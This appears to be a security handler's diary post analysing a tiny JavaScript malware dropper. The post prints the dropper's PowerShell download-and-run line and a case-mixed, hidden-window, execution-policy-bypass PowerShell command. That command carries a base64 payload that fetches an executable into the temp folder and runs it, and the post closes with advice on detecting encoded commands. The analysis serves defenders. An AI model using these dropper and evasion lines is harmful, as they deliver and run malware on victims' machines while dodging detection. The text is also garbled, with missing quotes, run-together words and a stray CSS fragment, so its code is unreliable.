Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small Javascript sample with only 2 lines of code:
var d=new ActiveXObject(Shell.NormandApplication.replace(Normand, d.ShellExecute(PowerShell,((New-Object System.Net.WebClient).DownloadFile(http://[redacted].exe, xwing.pifStart-Process xwing.pif,,
There is no real obfuscation here, just atrick to avoid the detection of the string Shell.Application which often searched by automated tools
Sometimes, there is no need to implement complex code to bypass detection. A good example comes withPowerShell which has the following cool padding:5px 10px"> poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \ IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\ kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\ AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\ BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\ dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\ 0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g
The decoded inVokE-ExPResSIoN $ENv:tEMP\output.exe
Nothing fancy, easy to decode but this trick will bypass most of the default security controls. A good idea is to fine tune your regular expressions and filters to catch the -encodedcommand string (and ignore the case).
Note that the PE file is downloaded via HTTPS!
[1]https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key